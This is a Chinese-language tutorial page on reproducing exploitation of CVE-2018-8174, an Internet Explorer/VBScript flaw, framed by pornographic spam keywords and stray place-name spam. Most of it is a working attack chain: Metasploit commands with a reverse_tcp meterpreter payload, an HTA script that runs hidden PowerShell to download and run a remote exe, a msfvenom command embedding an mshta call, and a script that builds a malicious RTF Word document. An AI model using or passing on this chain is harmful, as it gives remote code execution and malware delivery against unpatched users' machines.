亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么實現0day漏洞CVE-2018-8174的復現

發布時間:2021-12-22 21:38:06 來源:億速云 閱讀:377 作者:柒染 欄目:安全技術

今天就跟大家聊聊有關怎么實現0day漏洞CVE-2018-8174的復現,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

POC驗證

未打補丁系統,IE瀏覽器打開此地址會彈出計算器 。

http://test.lr3800.com/CVE-2018-8174_PoC.html

怎么實現0day漏洞CVE-2018-8174的復現

metasploit 復現

下載 metasploit 模塊到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

將CVE-2018-8174.rb復制到 fileformat 目錄

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

將CVE-2018-8174.rtf復制到 exploits 目錄

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

啟動 metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit

怎么實現0day漏洞CVE-2018-8174的復現

復制 /root/.msf4/local/目錄中的 msf.rtf 文件到目標主機上使用word文檔打開    
或者IE瀏覽器打開 http://192.168.0.116:8080 即可獲得會話

自定義下載者 復現

利用 mshta 從遠程服務器下載文件執行。

請先下載poc附件,下文中使用 鏈接:https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 密碼:ci8h

1.構造HTA文件,當訪問hta文件就會觸發powershell下載文件至臨時目錄執行

準備你的xx.exe文件上傳至站點目錄,假如得到地址 http://xxx.com/xxx.exe

怎么實現0day漏洞CVE-2018-8174的復現

HTA代碼:

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>

把該文件命名 8174.hta 上傳至站點目錄;假如得到地址 http://xxx.lr3800.com/8174.hta

2.使用msfvenom生成 js Shellcode

msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86

怎么實現0day漏洞CVE-2018-8174的復現

把生成的Shellcode字符替換至 8174poc.html 166行代碼

怎么實現0day漏洞CVE-2018-8174的復現怎么實現0day漏洞CVE-2018-8174的復現

把 8174poc.html 文件上傳至站點目錄 假如得到地址 http://xxx.lr3800.com/8174poc.html

3.生成Word文檔

* 下載python腳本保存本地

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

運行 CVE-2018-8174.py

python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf

怎么實現0day漏洞CVE-2018-8174的復現

得到目錄中的 “exp.rtf ”文件,使用Word文檔打開即可下載執行xx.exe文件,或者IE瀏覽器打開 http://xxx.lr3800.com/8174poc.html    即可下載執行xx.exe文件

看完上述內容,你們對怎么實現0day漏洞CVE-2018-8174的復現有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

通江县| 佛学| 绥化市| 册亨县| 大同县| 民县| 建水县| 府谷县| 玉林市| 万盛区| 呈贡县| 广安市| 海盐县| 手游| 东源县| 阳原县| 澄城县| 汕头市| 方山县| 重庆市| 漳州市| 林周县| 东丽区| 永城市| 丰顺县| 嘉峪关市| 阳春市| 东至县| 苍南县| 宜丰县| 南华县| 潼南县| 岑溪市| 济源市| 聊城市| 浦东新区| 沭阳县| 内丘县| 皋兰县| 苍梧县| 临沂市|